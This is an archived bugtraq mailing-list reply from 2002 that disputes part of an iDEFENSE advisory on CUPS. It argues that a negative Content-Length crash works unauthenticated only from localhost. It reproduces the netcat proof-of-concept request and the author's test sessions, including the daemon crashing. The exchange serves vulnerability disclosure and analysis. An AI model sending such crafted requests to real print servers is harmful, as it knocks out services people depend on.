[28294] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post
Re: iDEFENSE Security Advisory 12.19.02: Multiple Security Vulnerabilities

daemon@ATHENA.MIT.EDU (Joe Testa)
Sat Dec 21 18:57:12 2002

To: full-disclosure@lists.netsys.com, bugtraq@securityfocus.com,
        vuldb@securityfocus.com
Message-ID: <OFDD72E5C0.7E10DF3E-ON85256C96.006D7161@hq.rapid7.com>
From: "Joe Testa" <Joe_Testa@rapid7.com>
Date: Sat, 21 Dec 2002 14:59:06 -0500
MIME-Version: 1.0
Content-type: multipart/mixed; 
	Boundary="0__=0ABBE605DFFEF7F18f9e8a93df938690918c0ABBE605DFFEF7F1"
Content-Disposition: inline

--0__=0ABBE605DFFEF7F18f9e8a93df938690918c0ABBE605DFFEF7F1
Content-type: text/plain; charset=us-ascii

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



> **** ISSUE 4 - Negative Length Memcpy() Calls ****
>
> Negative length memcpy() calls can lead to a denial of service (DoS) and,
> on some platforms, remote root compromise. The following examples
> demonstrate these vulnerabilities:
>
> $ nc -v localhost 631
> localhost [127.0.0.1] 631 (?) open
> POST /printers HTTP/1.1
> Host: localhost
> Authorization: Basic AAA
> Content-Length: -1


I believe this is inaccurate/misleading.

A remote attacker cannot cause CUPSd to call memcpy() with a negative
value unless he or she is authenticated.  An attacker with local access,
however, can.  More specifically, if the attacker's source IP is 127.0.0.1,
then the server can be DOSed/overflowed without authentication.  If the
attacker's source IP is not 127.0.0.1, then the server will return an error
message without parsing the negative 'Content Length' field.


Example:

[jdog@wonderland jdog]$ nc -v localhost 631
localhost.localdomain [127.0.0.1] 631 (?) open
POST /printers HTTP/1.1
Host: localhost
Authorization: Basic AAA
Content-Length: -1


[jdog@wonderland jdog]$ nc -v localhost 631
localhost.localdomain [127.0.0.1] 631 (?) : Connection refused

... CUPSd has crashed.  Now lets see what happens when we use the eth0
IP:

[jdog@wonderland jdog]$ nc -v 192.168.x.x 631
192.168.x.x: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.x.x] 631 (?) open
POST /printers HTTP/1.1
Host: 192.168.x.x
Authorization: Basic AAA
Content-Length: -1

HTTP/1.1 403 Forbidden
Date: Sat, 21 Dec 2002 19:12:25 GMT
Server: CUPS/1.1
Content-Language: C
Upgrade: TLS/1.0,HTTP/1.1
Connection: close
Content-Type: text/html
Content-Length: 150

<HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY><H1>Forbidden</H1>
You don't have permission to access the resource on this server.</BODY>
</HTML>
[jdog@wonderland jdog]$



I'd like to point out that I have _assumed_ that the remote attacker must
authenticate in order to exploit this issue--I'm largely unfamiliar with
CUPS and I'm pressed for time...  Feel free to prove me wrong.

So, it doesn't seem like CUPSd is vulnerable to just any random attacker
who happens to be passing by.  I've tested this against RedHat 8.0's
'cups-1.1.15-10.src.rpm', along with ftp.cups.org's v1.1.14 and v1.1.17.

Word.

    - Joe Testa, Rapid 7, Inc.
    http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x02B00839
    A145 B158 2CA7 00A2 BAE8 4A18 57E5 18E0 02B0 0839


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (Cygwin32)

iD8DBQE+BMKtV+UY4AKwCDkRAhcMAJ4uWOCcfDJte9OKrDwz/eJ6g3Hp5wCfbsKU
V3w22HtfF1Q/NgZTcdu7XIg=
=GIBe
-----END PGP SIGNATURE-----

(See attached file: cups.txt.asc)

--0__=0ABBE605DFFEF7F18f9e8a93df938690918c0ABBE605DFFEF7F1
Content-type: application/octet-stream; 
	name="cups.txt.asc"
Content-Disposition: attachment; filename="cups.txt.asc"
Content-transfer-encoding: base64

LS0tLS1CRUdJTiBQR1AgU0lHTkVEIE1FU1NBR0UtLS0tLQpIYXNoOiBTSEExCgoKCj4gKioqKiBJ
U1NVRSA0IC0gTmVnYXRpdmUgTGVuZ3RoIE1lbWNweSgpIENhbGxzICoqKioKPgo+IE5lZ2F0aXZl
IGxlbmd0aCBtZW1jcHkoKSBjYWxscyBjYW4gbGVhZCB0byBhIGRlbmlhbCBvZiBzZXJ2aWNlIChE
b1MpIGFuZCwKPiBvbiBzb21lIHBsYXRmb3JtcywgcmVtb3RlIHJvb3QgY29tcHJvbWlzZS4gVGhl
IGZvbGxvd2luZyBleGFtcGxlcwo+IGRlbW9uc3RyYXRlIHRoZXNlIHZ1bG5lcmFiaWxpdGllczoK
Pgo+ICQgbmMgLXYgbG9jYWxob3N0IDYzMQo+IGxvY2FsaG9zdCBbMTI3LjAuMC4xXSA2MzEgKD8p
IG9wZW4KPiBQT1NUIC9wcmludGVycyBIVFRQLzEuMQo+IEhvc3Q6IGxvY2FsaG9zdAo+IEF1dGhv
cml6YXRpb246IEJhc2ljIEFBQQo+IENvbnRlbnQtTGVuZ3RoOiAtMQoKCkkgYmVsaWV2ZSB0aGlz
IGlzIGluYWNjdXJhdGUvbWlzbGVhZGluZy4KCkEgcmVtb3RlIGF0dGFja2VyIGNhbm5vdCBjYXVz
ZSBDVVBTZCB0byBjYWxsIG1lbWNweSgpIHdpdGggYSBuZWdhdGl2ZQp2YWx1ZSB1bmxlc3MgaGUg
b3Igc2hlIGlzIGF1dGhlbnRpY2F0ZWQuICBBbiBhdHRhY2tlciB3aXRoIGxvY2FsIGFjY2VzcywK
aG93ZXZlciwgY2FuLiAgTW9yZSBzcGVjaWZpY2FsbHksIGlmIHRoZSBhdHRhY2tlcidzIHNvdXJj
ZSBJUCBpcyAxMjcuMC4wLjEsCnRoZW4gdGhlIHNlcnZlciBjYW4gYmUgRE9TZWQvb3ZlcmZsb3dl
ZCB3aXRob3V0IGF1dGhlbnRpY2F0aW9uLiAgSWYgdGhlCmF0dGFja2VyJ3Mgc291cmNlIElQIGlz
IG5vdCAxMjcuMC4wLjEsIHRoZW4gdGhlIHNlcnZlciB3aWxsIHJldHVybiBhbiBlcnJvcgptZXNz
YWdlIHdpdGhvdXQgcGFyc2luZyB0aGUgbmVnYXRpdmUgJ0NvbnRlbnQgTGVuZ3RoJyBmaWVsZC4K
CgpFeGFtcGxlOgoKW2pkb2dAd29uZGVybGFuZCBqZG9nXSQgbmMgLXYgbG9jYWxob3N0IDYzMQps
b2NhbGhvc3QubG9jYWxkb21haW4gWzEyNy4wLjAuMV0gNjMxICg/KSBvcGVuClBPU1QgL3ByaW50
ZXJzIEhUVFAvMS4xCkhvc3Q6IGxvY2FsaG9zdApBdXRob3JpemF0aW9uOiBCYXNpYyBBQUEKQ29u
dGVudC1MZW5ndGg6IC0xCgoKW2pkb2dAd29uZGVybGFuZCBqZG9nXSQgbmMgLXYgbG9jYWxob3N0
IDYzMQpsb2NhbGhvc3QubG9jYWxkb21haW4gWzEyNy4wLjAuMV0gNjMxICg/KSA6IENvbm5lY3Rp
b24gcmVmdXNlZAoKLi4uIENVUFNkIGhhcyBjcmFzaGVkLiAgTm93IGxldHMgc2VlIHdoYXQgaGFw
cGVucyB3aGVuIHdlIHVzZSB0aGUgZXRoMApJUDoKCltqZG9nQHdvbmRlcmxhbmQgamRvZ10kIG5j
IC12IDE5Mi4xNjgueC54IDYzMQoxOTIuMTY4LngueDogaW52ZXJzZSBob3N0IGxvb2t1cCBmYWls
ZWQ6IFVua25vd24gaG9zdAooVU5LTk9XTikgWzE5Mi4xNjgueC54XSA2MzEgKD8pIG9wZW4KUE9T
VCAvcHJpbnRlcnMgSFRUUC8xLjEKSG9zdDogMTkyLjE2OC54LngKQXV0aG9yaXphdGlvbjogQmFz
aWMgQUFBCkNvbnRlbnQtTGVuZ3RoOiAtMQoKSFRUUC8xLjEgNDAzIEZvcmJpZGRlbgpEYXRlOiBT
YXQsIDIxIERlYyAyMDAyIDE5OjEyOjI1IEdNVApTZXJ2ZXI6IENVUFMvMS4xCkNvbnRlbnQtTGFu
Z3VhZ2U6IEMKVXBncmFkZTogVExTLzEuMCxIVFRQLzEuMQpDb25uZWN0aW9uOiBjbG9zZQpDb250
ZW50LVR5cGU6IHRleHQvaHRtbApDb250ZW50LUxlbmd0aDogMTUwCgo8SFRNTD48SEVBRD48VElU
TEU+NDAzIEZvcmJpZGRlbjwvVElUTEU+PC9IRUFEPjxCT0RZPjxIMT5Gb3JiaWRkZW48L0gxPgpZ
b3UgZG9uJ3QgaGF2ZSBwZXJtaXNzaW9uIHRvIGFjY2VzcyB0aGUgcmVzb3VyY2Ugb24gdGhpcyBz
ZXJ2ZXIuPC9CT0RZPgo8L0hUTUw+CltqZG9nQHdvbmRlcmxhbmQgamRvZ10kIAoKCgpJJ2QgbGlr
ZSB0byBwb2ludCBvdXQgdGhhdCBJIGhhdmUgX2Fzc3VtZWRfIHRoYXQgdGhlIHJlbW90ZSBhdHRh
Y2tlciBtdXN0CmF1dGhlbnRpY2F0ZSBpbiBvcmRlciB0byBleHBsb2l0IHRoaXMgaXNzdWUtLUkn
bSBsYXJnZWx5IHVuZmFtaWxpYXIgd2l0aApDVVBTIGFuZCBJJ20gcHJlc3NlZCBmb3IgdGltZS4u
LiAgRmVlbCBmcmVlIHRvIHByb3ZlIG1lIHdyb25nLgoKU28sIGl0IGRvZXNuJ3Qgc2VlbSBsaWtl
IENVUFNkIGlzIHZ1bG5lcmFibGUgdG8ganVzdCBhbnkgcmFuZG9tIGF0dGFja2VyCndobyBoYXBw
ZW5zIHRvIGJlIHBhc3NpbmcgYnkuICBJJ3ZlIHRlc3RlZCB0aGlzIGFnYWluc3QgUmVkSGF0IDgu
MCdzCidjdXBzLTEuMS4xNS0xMC5zcmMucnBtJywgYWxvbmcgd2l0aCBmdHAuY3Vwcy5vcmcncyB2
MS4xLjE0IGFuZCB2MS4xLjE3LgoKV29yZC4KCiAgICAtIEpvZSBUZXN0YSwgUmFwaWQgNywgSW5j
LgogICAgaHR0cDovL3BncC5taXQuZWR1OjExMzcxL3Brcy9sb29rdXA/b3A9Z2V0JnNlYXJjaD0w
eDAyQjAwODM5CiAgICBBMTQ1IEIxNTggMkNBNyAwMEEyIEJBRTggNEExOCA1N0U1IDE4RTAgMDJC
MCAwODM5CgoKLS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogR251UEcgdjEu
MC43IChDeWd3aW4zMikKCmlEOERCUUUrQk1LdFYrVVk0QUt3Q0RrUkFoY01BSjR1V09DY2ZESnRl
OU9LckR3ei9lSjZnM0hwNXdDZmJzS1UKVjN3MjJIdGZGMVEvTmdaVGNkdTdYSWc9Cj1HSUJlCi0t
LS0tRU5EIFBHUCBTSUdOQVRVUkUtLS0tLQo=

--0__=0ABBE605DFFEF7F18f9e8a93df938690918c0ABBE605DFFEF7F1--

home	help	back	first	fref	pref	prev	next	nref	lref	last	post
[28294] in bugtraq

Re: iDEFENSE Security Advisory 12.19.02: Multiple Security Vulnerabilities

daemon@ATHENA.MIT.EDU (Joe Testa)Sat Dec 21 18:57:12 2002

daemon@ATHENA.MIT.EDU (Joe Testa)
Sat Dec 21 18:57:12 2002
